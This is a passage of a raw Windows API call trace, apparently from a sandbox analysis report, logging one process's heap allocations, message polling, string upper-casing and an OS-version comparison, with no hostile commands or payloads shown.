hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbf8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb08 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecbc8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72858 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726c8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecaf0 | out: hHeap=0x2af0000) returned 1 [0084.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5c08 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72858 [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6f030 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72878 [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77080 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72888 [0084.396] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77080 | out: hHeap=0x2af0000) returned 1 [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72888 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ac8 [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29edd68 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76a40 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0084.396] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76b58 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0084.396] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.397] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b88 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76928 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee008 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729e8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a769a0 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a98 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a766d0 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee080 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee110 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a76928 | out: hHeap=0x2af0000) returned 1 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b88 | out: hHeap=0x2af0000) returned 1 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0084.397] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a766a8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b78 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee0c8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729d8 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729d8 | out: hHeap=0x2af0000) returned 1 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729f8 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee020 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ee188 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0084.397] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edf48 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0084.397] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729f8 | out: hHeap=0x2af0000) returned 1 [0084.398] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.398] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72af8 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee350 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee488 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee398 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee4b8 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee320 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b88 | out: hHeap=0x2af0000) returned 1 [0084.398] lstrlenW (lpString="20") returned 2 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee1e8 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729b8 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee200 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee308 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee020 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ee188 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edf48 | out: hHeap=0x2af0000) returned 1 [0084.398] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729a8 | out: hHeap=0x2af0000) returned 1 [0084.398] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.398] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.398] lstrlenW (lpString="31") returned 2 [0084.398] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.398] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.399] lstrlenW (lpString="20") returned 2 [0084.399] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.399] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.399] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0084.399] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0084.399] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0084.399] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0084.399] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.399] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.399] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.399] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.399] lstrlenW (lpString="20") returned 2 [0084.399] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.400] lstrlenW (lpString="30") returned 2 [0084.400] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.400] lstrlenW (lpString="20") returned 2 [0084.400] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cebc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cebc8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0084.400] SetLastError (dwErrCode=0x3f0) [0084.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.400] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0084.400] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0084.400] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0084.400] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0084.400] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.400] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] lstrlenW (lpString="20") returned 2 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] lstrlenW (lpString="31") returned 2 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] lstrlenW (lpString="20") returned 2 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.401] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0084.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef160 [0084.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0084.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef280 [0084.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0084.401] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef160 | out: hHeap=0x2af0000) returned 1 [0084.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef310 [0084.401] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef160 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b38 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef280 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef310 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef1c0 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eee18 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef0a0 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeff8 | out: hHeap=0x2af0000) returned 1 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b98 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0084.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef430 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef160 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeff8 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.402] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0084.402] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef0a0 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ac8 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78fe8 [0084.402] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a78 [0084.402] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78fe8 | out: hHeap=0x2af0000) returned 1 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a78 | out: hHeap=0x2af0000) returned 1 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29eee18 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.403] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a98 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef160 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef280 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ad8 [0084.403] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79308 [0084.403] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0084.403] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 